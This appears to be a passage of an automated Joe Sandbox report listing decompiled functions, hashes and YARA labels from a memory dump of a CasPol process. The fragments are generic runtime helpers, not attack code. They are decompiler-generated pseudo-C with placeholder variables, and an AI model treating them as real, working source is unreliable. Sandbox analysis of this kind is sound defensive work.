                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 700f52823ab6a4eaabaae5d3819156b44a5ae03e1dd18645143438cadc591d89
                                                                                                                                                                                                                                                                                                • Instruction ID: 3695ee78a56a961679074eea8560f26c8b622b1159b302f5b8f97700220a7632
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 700f52823ab6a4eaabaae5d3819156b44a5ae03e1dd18645143438cadc591d89
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37D017625610005BC72E67209958F25B62AF784760F344A2DE7868B9AAFAE089D9D248
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0173AAB0 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0173AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                                                                                                                                                                                                                                                0x0173aab6
                                                                                                                                                                                                                                                                                                0x0173aabb
                                                                                                                                                                                                                                                                                                0x0178a442
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178a448
                                                                                                                                                                                                                                                                                                0x0178a454
                                                                                                                                                                                                                                                                                                0x0178a454
                                                                                                                                                                                                                                                                                                0x0173aac1
                                                                                                                                                                                                                                                                                                0x0173aac1
                                                                                                                                                                                                                                                                                                0x0173aac6
                                                                                                                                                                                                                                                                                                0x0173aac6

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                                                                                                                                                                                                • Instruction ID: 151baf1725fc986ec8f4eb23feeb9ea33e6462b8f259b3a0aaf50da07c0f9fd5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0D0C935352980CFD617CB0CC554B0573A4FB44B80FC50490E540CB722E62CD940CA00
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0172DB40 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0172DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01744620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                                                                                                                                                                                                                                                0x0172db4d
                                                                                                                                                                                                                                                                                                0x0172db54
                                                                                                                                                                                                                                                                                                0x0172db5f
                                                                                                                                                                                                                                                                                                0x0172db56
                                                                                                                                                                                                                                                                                                0x0172db56
                                                                                                                                                                                                                                                                                                0x0172db5c
                                                                                                                                                                                                                                                                                                0x0172db5c

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                                                                                                                                                                                                • Instruction ID: 1666e1bf8b6251cc3c1fec18ed57d6ea3d0486ec68f208a1dc14c50445425954
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22C08C30280A01ABEB322F20CD01B00BAA0BB10B01F4400A0A301DA0F0DB78DC02E600
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017AA537 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E017AA537(intOrPtr _a4, intOrPtr _a8) {

				return L01748E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                                                                                                                                                                                                                                                0x017aa553

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                                                                                                                                                                                                                • Instruction ID: 3173438b612f8569e25964049dc34acb5ca0a2b23c12f9e71ee23f8a749b673b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0C01232080248BBCB226E81CC00F06BB2AEBA8B60F008010BA080A5608632E970EA84
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0172AD30 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0172AD30(intOrPtr _a4) {

				return L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                                                                                                                                                                                                                                                0x0172ad49

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                                                                                                                                                                                                • Instruction ID: 61eb30381277c972c461a283e258b520572f5f3afd259cfa46e6bccda325f854
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7C08C32080248BBC712AA45CD00F01BB29E7A0B60F000020F6040A6618A32E860D588
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01743A1C Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E01743A1C(intOrPtr _a4) {
				void* _t5;

				return L01744620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                                                                                                                                                                                                                                                0x01743a35

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                                                                                                                                                                                                • Instruction ID: 2a8c3a860d008d24fd7f8874183f3fd79ab3868bd4a263ffdef057059e515716
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7C08C32080248BBC7126E41DC00F01BB29E7A0B60F000020B6040A5608632EC60E589
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01747D50 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E01747D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                                                                                                                                                                                                                                                0x01747d56
                                                                                                                                                                                                                                                                                                0x01747d5b
                                                                                                                                                                                                                                                                                                0x01747d60
                                                                                                                                                                                                                                                                                                0x01747d5d
                                                                                                                                                                                                                                                                                                0x01747d5d
                                                                                                                                                                                                                                                                                                0x01747d5d

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                                                                                                                                                                                                • Instruction ID: 297d6dcd97cf2939d3a23e16cc97b2258035159ec9bd4838c7f4b847c85a5583
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81B092353119408FCE1ADF28C080B1573E4BB44A40B8500D0E400CBA21D329E8408900
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769560 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d9f16591124cc03a6a8eb0f1e8bba4cba60243057ce826031847a3c19dcd1884
                                                                                                                                                                                                                                                                                                • Instruction ID: a3eb0b467d83d0d3e52ebe34256deb6fe620c6ea23afac7cd35cede65d5d3f4f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9f16591124cc03a6a8eb0f1e8bba4cba60243057ce826031847a3c19dcd1884
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC900265225000061555A599460450B4445BBDA391791C025F1407590CC66188657361
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769950 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f001ef47f7b6ad0ece209d1553cbdf9929b80ac08c0851b412f2072e85d28142
                                                                                                                                                                                                                                                                                                • Instruction ID: 2a7ae217d0d0b272b97e3db00cd5db4398ebf08294099ba41a6c9c9c9edc10f0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f001ef47f7b6ad0ece209d1553cbdf9929b80ac08c0851b412f2072e85d28142
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A19002A120540407E550659988046074005ABD4342F51C021A2055555ECA698C517175
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0176AD30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f6be2e220e93c7a066f6dac5a19961b9de1cfeb5ea46d6bd751c4695e37c0b66
                                                                                                                                                                                                                                                                                                • Instruction ID: f0ab6b1391648f65ce4af345cd3897e753fd7dbb988d0ef50b7240dfc718b1d2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6be2e220e93c7a066f6dac5a19961b9de1cfeb5ea46d6bd751c4695e37c0b66
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC900271A0900016A550719988146468006BBE4781F55C021A0505554CC9948A5573E1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769520 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 9e8b9a63c6d7c63643c5dc03583e6db347458fd750d2341f3b60ae3d6121767e
                                                                                                                                                                                                                                                                                                • Instruction ID: 50617817ddee61f3dd27fd3e6ca99cfa06f9c3bc414b0c4cb156006f69259eb9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e8b9a63c6d7c63643c5dc03583e6db347458fd750d2341f3b60ae3d6121767e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 149002E1205140965910A299C404B0A8505ABE4241F51C026E1045560CC5658851B175
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769B00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 1f5e662de30ce381388d53d82132cbebd3b78c12d66225e619e80a072ef1531f
                                                                                                                                                                                                                                                                                                • Instruction ID: 0f5573c07211ad5a3f35cbe483ec7adb61b7198ecc87ca3f7c92a2528673322b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f5e662de30ce381388d53d82132cbebd3b78c12d66225e619e80a072ef1531f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD90026124500806E5507199C4147074006EBD4641F51C021A0015554DC656896576F1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017699D0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 82ac3b911cd36b14f24e2584decf00431518a22069893187ad162728f7ecb8a7
                                                                                                                                                                                                                                                                                                • Instruction ID: 565752c7e1bc24a75ad63db97097b44aa33c05354e16ef65ecfe18092db15374
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82ac3b911cd36b14f24e2584decf00431518a22069893187ad162728f7ecb8a7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B89002A121500046E514619984047064045ABE5241F51C022A2145554CC5698C617165
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0176A3B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f0c3517a112b817d3746f976bd7361e5016f017357859ac69f7ae7a5a52fd7e8
                                                                                                                                                                                                                                                                                                • Instruction ID: 6a3ae8f6d07b9a91654fef7168306a1e39b77c5b48d892d1e30409f7a42177f8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0c3517a112b817d3746f976bd7361e5016f017357859ac69f7ae7a5a52fd7e8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB90027120544006E5507199C44460B9005BBE4341F51C421E0416554CC6558856B261
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0176B040 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 32106e3eaf4681c758237825f6b97434df571dc285d3b038f94110d20865272c
                                                                                                                                                                                                                                                                                                • Instruction ID: 741e359f3c76e86d2d8e5968075d7650650716dc4f8ddf69e52906a50538d6cf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32106e3eaf4681c758237825f6b97434df571dc285d3b038f94110d20865272c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 959002A1605140475950B19988044069015BBE5341791C131A0445560CC6A88855B2A5
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769820 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7dafa047c4d8c1fd0493f83a91fb948ac9d61fba7b83760bcd2884db7d4a4763
                                                                                                                                                                                                                                                                                                • Instruction ID: a131523d84339b8c12c5b8089cc79a332a2a7ae7b133f1dc6061dfcc792bf7cb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dafa047c4d8c1fd0493f83a91fb948ac9d61fba7b83760bcd2884db7d4a4763
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E90027124500406E551719984046064009BBD4281F91C022A0415554EC6958A56BAA1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769A10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 48274458971ee1eb1f92c8dbaa16be5126ee90b78c44db562df4421d2311e07a
                                                                                                                                                                                                                                                                                                • Instruction ID: 5d99a514e7855cb9debda24309382c666b6f1e624232118e3e9da74c6fbb9226
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48274458971ee1eb1f92c8dbaa16be5126ee90b78c44db562df4421d2311e07a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C90027120540406E510619988087474005ABD4342F51C021A5155555EC6A5C8917571
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017698A0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7bb06a5bca76ea56a24b406fc85f8a979f7306b3143b43673edad7d6af96d7a3
                                                                                                                                                                                                                                                                                                • Instruction ID: df40499952f58a9db9dded6c79ddda9720a70042305c1d172b57fea8103f6ab2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bb06a5bca76ea56a24b406fc85f8a979f7306b3143b43673edad7d6af96d7a3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0990026130500406E512619984146064009EBD5385F91C022E1415555DC6658953B172
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01769A80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 22387794dce52dd04d89ed385b289bc1e27cf72381b8a064b1644f78f5a01cab
                                                                                                                                                                                                                                                                                                • Instruction ID: 856ce615fc18c1f45661e323b0735da9626e843524b46d722ded8109b8557696
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22387794dce52dd04d89ed385b289bc1e27cf72381b8a064b1644f78f5a01cab
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B90026120544446E55062998804B0F8105ABE5242F91C029A4147554CC95588557761
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                Execution Coverage:3.2%
